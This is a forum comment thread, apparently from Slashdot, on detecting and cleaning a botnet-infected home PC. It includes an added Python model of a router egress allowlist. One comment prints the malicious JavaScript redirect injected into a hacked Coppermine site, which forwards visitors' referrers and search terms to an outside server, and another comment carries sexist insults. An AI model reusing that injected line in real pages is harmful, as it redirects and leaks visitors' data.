-- See?
Your father was simply downloading porn through p2p.
This won't prevent a bot but at least limit its traffic with little impact. On your/his router, only allow 53 to your ISP's DNS servers, 25 to your specific ISP mail servers, port 80 and port 443. Nothing else. I did this for years on my kids' computers and there were very few side effects. Sure, if he is a computer guy he may want more ports, like usenet, bittorrent, ftp etc as required but I'd bet 99% of regular computer users don't use anything other than the short list of what I mentioned above. Another addition is to limit what I said above to a single IP address that his computer has; if he needs something else, he can change his IP and change it back when he is done.
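The allowlist in the post above, worked through as an added example (not code from the thread): a Python policy evaluator that applies the four permitted outbound flows, plus the optional single-source-address restriction, to a handful of constructed flows, so you can see what a default-deny egress rule set lets through and what it silently breaks. The ISP resolver and mail-server addresses, the LAN address and the flows are all constructed placeholders.

```python
"""Outbound allowlist as described in the post: DNS only to the ISP resolvers,
SMTP only to the ISP mail server, HTTP and HTTPS to anywhere, everything else
denied, optionally from one LAN address only.  Added example with constructed
addresses; adapt the sets to the real ISP values before using the idea."""
import ipaddress

# Constructed placeholder addresses (documentation ranges), not real ISP servers.
ISP_DNS = {ipaddress.ip_address("203.0.113.53"), ipaddress.ip_address("203.0.113.54")}
ISP_MAIL = {ipaddress.ip_address("203.0.113.25")}
ALLOWED_SOURCE = ipaddress.ip_address("192.168.1.101")  # the one LAN host permitted out

# (rule name, protocol or None for any, destination port, permitted servers or None for any)
RULES = [
    ("DNS to ISP resolvers", None, 53, ISP_DNS),
    ("SMTP to ISP mail", "tcp", 25, ISP_MAIL),
    ("HTTP", "tcp", 80, None),
    ("HTTPS", "tcp", 443, None),
]


def evaluate(src, dst, proto, dport, restrict_source=True):
    """Return (allowed, reason) for one outbound flow under the allowlist."""
    src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if restrict_source and src_ip != ALLOWED_SOURCE:
        return False, "source is not the permitted LAN address"
    for name, rule_proto, rule_port, servers in RULES:
        if dport != rule_port or (rule_proto is not None and rule_proto != proto):
            continue
        if servers is None or dst_ip in servers:
            return True, name
        return False, f"{name}: destination not in the permitted server set"
    return False, "default deny"


# Constructed flows in (src, dst, proto, dport) form, as a router log would show them.
FLOWS = [
    ("192.168.1.101", "203.0.113.53", "udp", 53),      # DNS to the ISP resolver
    ("192.168.1.101", "198.51.100.1", "udp", 53),      # DNS to some other resolver
    ("192.168.1.101", "198.51.100.23", "tcp", 34521),  # high remote port, like the log
    ("192.168.1.101", "203.0.113.10", "tcp", 443),     # ordinary HTTPS
    ("192.168.1.101", "203.0.113.10", "tcp", 21),      # FTP: the side effect the post mentions
    ("192.168.1.102", "203.0.113.10", "tcp", 80),      # another LAN host: blocked by source rule
    ("192.168.1.101", "198.51.100.23", "udp", 3074),   # UDP to a non-service port
]


def audit(flows, restrict_source=True):
    """Evaluate every flow; returns a list of (flow, allowed, reason)."""
    return [(f, *evaluate(*f, restrict_source=restrict_source)) for f in flows]


def blocked_count(flows, restrict_source=True):
    return sum(1 for _, allowed, _ in audit(flows, restrict_source) if not allowed)


if __name__ == "__main__":
    for flow, allowed, reason in audit(FLOWS):
        src, dst, proto, dport = flow
        print(f"{'ALLOW' if allowed else 'DROP '} {src} -> {dst} {proto}/{dport}: {reason}")
```

Two of the drops are worth noticing: the FTP flow is the kind of legitimate thing the post says you will occasionally have to open up, and the DNS flow to a non-ISP resolver is blocked because the post pins port 53 to the ISP's servers rather than to the whole Internet. A bot that tunnels its control channel over port 80 or 443 still gets out, which is why the post calls this a traffic limit rather than prevention.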
Last week I was victim to an exploit in an older version of Coppermine, a photo-sharing app. The culprits uploaded a number of php scripts. Most scripts were designed to provide readily-indexable terms and phrases to search-engine spiders. If unwitting googlers went to the page, they were redirected to a fake anti-virus site which encourages you to download a trojan.
Interestingly, before redirecting the user to the fake site, the user's search terms (in addition to other data) were forwarded to a server in Russia. Presumably this was to continually optimize the index terms to those actually being searched for.
The code had been on my server for less than 3 days. After removing it, I still got 100s of hits from unwitting google and yahoo searchers.
A quick search of my own on google revealed 1000s of compromised servers. Wanna have fun with the black hat's server? Here's the relevant line from their scripts:
window.location = ("http://luckystats1.com/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default");
Does it say "Start" ?
:)
Botnet.
Windows is not the answer.
Windows is the question.
The answer is "NO."
If you go to YouTube and search for "Xbox host booting", there are a shitload of tutorials on how to set up a botnet to kick somebody in a Halo 3 session so they win automatically. They all use UDP port 3074. If you see that then you know that on the other side is some kid who couldn't lose a game.
New Economic Perspectives
Download and install Wireshark from http://www.wireshark.org/
Fire it up and watch everything on the NIC
---- "Logoff! That cookie shit makes me nervous!" - A. Soprano
He's just torrenting porn...
We are the 198 proof..
> I have also secured the Linksys.
You're lucky it wasn't hijacked and bricked
- You know that a politician is lying, if his lips are moving. :P
- You know you have a botnet zombie if you're using Windows.
My parents live overseas as well. I try and help them as much as I can from here. I tried once to convert them to Linux but that did not go well.
The university I used to attend came up with a pretty neat way to keep their Windows desktops clean. I believe the machines were booting Linux but they would immediately launch VMware Player running Windows on it. The end user could barely even notice that the machine was not booting straight into Windows. All the desktops were rebooted every night and the next day a fresh copy of the VM image was run. If you wanted to save anything, you had to save it on a USB drive because on the next day the machine was clean again. I think this might be the best solution to support my parents overseas. Comments anyone? What do you all think?
Botflies deposit eggs in a host body, or sometimes use an intermediate vector: common houseflies for example. The smaller fly is firmly held by the botfly female and rotated to a position where the botfly attaches some 30 eggs to the body under the wings. Larvae from these eggs, stimulated by the warmth of a large mammal host, drop onto its skin and burrow underneath.
Eggs are deposited in animal skin directly, or the larvae drop from the egg: the body heat of the animal induces hatching upon contact. Some forms of botfly also reside in the digestive tract when consumed by a licking action.
Myiasis can be caused by larvae burrowing into the skin (or tissue lining) of the host animal. Mature larvae drop from the host and complete the pupal stage in soil. They do not kill the host animal, and thus are true parasites (though some species of rodent-infesting botflies do consume the host's testes/ovaries).
how did you log in to fix things when it was not connected to teh internets? Serious.
Re: Question 5. I just cleaned a computer displaying similar behaviour the other day. It took GMER from http://www.gmer.net/ to disable and remove the rootkit's dll on the machine I was working with. After that, I was able to run MBAM, install free avg, and had the system running very well.
...how this was tagged "windows" because it had botnet in the title as if no linux machine has ever been turned in to a zombie.
While setting up a dedicated IDS is something that would be good in an office environment... we're talking about a novice home user here. Frankly, much of the advice given on here is overkill or irrelevant (ie. installing OSX or Linux isn't a solution).
Here's what you need (of course, him being in India may throw a wrench into the availability of some of these solutions).
First things first, AntiVirus absolutely must be up to date. I recommend AVG Free... as the price is right. Unless he wants to get (or has access through his job as some do) Symantec AntiVirus Corporate Edition (which doesn't include all the bloatware).
Second, make sure Windows Defender is downloaded (http://tinyurl.com/kujpsj for the India site) and up to date.
Third, run all Windows updates.
Fourth, an additional Adware/Malware remover is a good idea... Lavasoft's Ad-Aware is user-friendly and picks up 99.9% of problems.
Fifth, do all that fun spring cleaning, (delete old restore points, clear temporary files, defrag the hd, etc)
Finally, check which security features are on his router. There have been some router worms going around. Check out this article to fix/lock down the router...http://tinyurl.com/ddt7l6
If none of that works... back up the data, and do the old Windows reinstall. Before restoring your data, have him bring it to the Indian equivalent of Geek Squad (or whatever computer fix-it shop) and have them run a virus scan on the backed up data.
If he's still having slow computer problems... then the hardware is just going on him (as with a fresh install of Windows, it should run pretty smoothly)
Here is my patent-pending Karma Burning Algorithm (TM):
if( GetOperatingSystem() == "Windows" ) return true;
else return false;
Simple!
is to ask yourself "Is my computer running Microsoft Windows?"
if the answer to that is "yes", then your computer is either already running a botnet or will be soon.
Switch to linux, then you'll know that it is not a Botnet
Unplug it. This Internet business is overrated anyway. Though, I wouldn't be surprised if a Windows machine managed to get infected even disconnected from the world.
Seriously, I've had Process Explorer in my kit for a while, but haven't used it for much lately. Have you tried Malwarebytes? I wonder why it's not on your list. FWIW, if you can't boot your system at all, one of the guys from MBAM suggests Avira http://www.free-av.com/en/products/12/avira_antivir_rescue_system.html . I haven't tried that one yet, but it's on my list of potentials, so I'd love to hear if anyone has worked with it.
Under the influence of Post-Cyberpunk Gonzo Journalism
"FWIW if you can't boot your system at all one of the guys from *the* MBAM *forums* suggests Avira "
Sorry, had to fix that.
http://www.raymond.cc/blog/archives/2008/12/11/13-antivirus-rescue-cds-software-compared-in-search-for-the-best-rescue-disk/
Meh, there's a comparison of boot discs. Looks like the best by this eval is the Kaspersky rescue disc, but Avira runs a close second.
I find that believable, Kaspersky is a great AV program, I highly recommend it.
Yea, if you're reimaging off of the install disk this is the best way to go. Automate the darn thing, leave it unattended, forget about entering license keys, or clicking "next" a thousand times. Drop the disc in and hang with your parents while you're there.
There are some very inexpensive UPS-enabled power strips today. APC makes a bunch. Just pick one up and make sure only your hardware router/firewall and hubs (if you use them) are plugged into it. With that light of a load, they will run longer than a larger UPS hooked up to your monitor and tower PC. Let's face it, if the power is out more than 30 minutes today, most home UPSs will run out of battery power before the smaller one dedicated to the modem and router/firewall. At least that has been my experience.
I put larger UPS hardware next to my primary work tower and (servers + big screen TV) and put a smaller less expensive UPS for my routers, modem, hubs. In the last two years I lost power for longer than 30 minutes only once. It was a no brainer shutting down everything before the UPS battery was completely depleted.
I was able to watch a 42 inch TV for 20 minutes before I had to turn it off, because the power did not come back on. So it is a pretty big UPS for a home. At least I do not have to worry about brown outs any more. The lights blink, no worries.
I turned the larger one off about 10 - 15 minutes before the smaller one keeping the modems and router/firewall hardware up ran out of juice. (I had a firewall/router, dumb hub and cable modem on that one smaller UPS, no problems and nothing else.)
Short answer? Yes.
If your computer is running Linux, Unix, OS/X it's not part of a botnet.
If your computer is not on any network it's not part of a botnet.
If your computer is running windows you take your chances.
Ashraya,
I live in Hyderabad, and I install Linux for a lot of people (friends, relatives, etc) around the place. I don't do windows, but if they're willing to spend a wee bit of time with me showing them the basics I'm sure they'll manage pretty well. Maybe not a scratch+install, but a dual boot would be fine.
Contact me at sitaramc -at- gmail -dot- com if you're interested. I live in the Srinagar Colony area but within reason, I'll go anywhere to help.
Oh, just in case you were wondering: no strings attached. None. (I have a very nice day job thank you! I do this for fun :-)
Set up Linux, something like Ubuntu/Kubuntu, on the two computers (desktop and laptop) and all problems with botnets are gone: no viruses, trojans and all this stuff. It is more secure to use it.
Torrents would seem like random connections to multiple machines.
Your first mistake is that you think not having a password on your router makes you get infected. You don't need Linux or anything. Get ComboFix and Malwarebytes. If you have anything, it's gone. If you really want to know, Ethereal works perfectly well. No need for a hub, or any of that bullshit. People rely way too much on Linux.
I replace my OS from an image of my install, backed up with all my software, so that an image can be reused in under 20 minutes and you are good to go. Once a month even is good, with or without traces of spyware or trojans etc... just to be safe. Also I keep all personal files off the C drive.
I also have a copy of an image for a client of mine that regularly gets viruses, he pays me for the reinstall each time, although it takes me 20min. I charge him my min. 1 hour.
The son in this case could just avoid a lot of heartache for himself and his dad, and just clone an image after a fresh install, and reuse that each time the father says something is up. As well, a config file can be backed up for the router (Linksys) so that you hard reset and reuse a saved config file to re-enable all the configured stuff on the router, except change to a new admin password!
http://tech.slashdot.org/comments.pl?sid=1327945&cid=28981391 seems to have easily put you in your place. You attempt to cut down others whom you have trolled before, and when you are asked for evidence of your blustering after you had attacked other posters as you have here also, it seemed you have no proof of anything you have ever done yourself in computing in the way of programming that was rated well by others, after you called the posters there stupid and what not. Anyone can talk a good game like you do, ion.simon.c, but it's quite another issue to actually play a good game. After all, you're the one stupid enough to be a registered user here and it made it ridiculously easy to find your post history and catch you messing up yourself. You ran from that post, why is that?
This will happen again: the wireless driver stack in Windows is poorly written and, as a result, users will disable the 'security' features just to get it to work consistently. Put another operating system on there. I suggest DOS or Linux if you don't want it to be exploited again in such a fashion.
Frankly, I'm surprised this got posted to slashdot. This is like "how do I floss my teeth?" or maybe "why is air breathable?" - both questions with easily findable answers via google. Maybe you should've started there.
~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
"How Can I Tell If My Computer Is Part of a Botnet?"
The ONLY way to be sure is to infect the machine. That way you can be 100% sure that it's infected. No more trying to figure out if it's infected or testing anything.
You can be certain using this method that the machine is or is not part of the Botnet.
Just boot up backtrack (the live linux cd) on another computer and use ettercap + tcpdump to sniff traffic on the switched network.
You could maybe set up a honeypot (Honeyd from the live CD) to see if your possibly infected computer is attacking other computers on your network.
Dude, your dad shut down twitter
Q: What do you call a Linux workstation on a network with other Linux workstations?
A: A Beowulf cluster
Q: What do you call a Windows machine on a network with other Windows machines?
A: A botnet.
Run Snort into BotHunter and see what happens on the reloaded machine. BotHunter is at SRI.
Per my subject-line above, plus, my even earlier replying & thanking whoever modded up my post INITIALLY to +1 INFORMATIVE? My post being @ "0 Troll" rating gives you away...
I.E.-> That "0 Troll" should have gone into the negative below zero ranges, & should have shown as "-1 Troll", if it were a troll & nobody modded it up. Obviously, someone did, before you rated it down, unjustifiably no less (like a woman would when proven wrong, not a man)...
Talk about stupidity in blowing a load of mod points for nothing on your parts (that's to my "naysayers" & trolls here that have nothing better in response once they get beaten - all they have then, is their effete mod-downs, but never any valid technically sound reasoning for it via replies)
APK
P.S.=> It must suck to live a life of a "not man", the kind that acts more like WOMEN DO, instead of a man does, operating via b.s. & rumor spreading + other dirty little tricks, like this one... whoever modded me down? You think about that, it IS directed, to you, specifically (&, it's the truth about you)... apk
Just flatten the system and rebuild it properly.
Bang! Botnet threat gone.
Please clone yourself...we need multiple copies.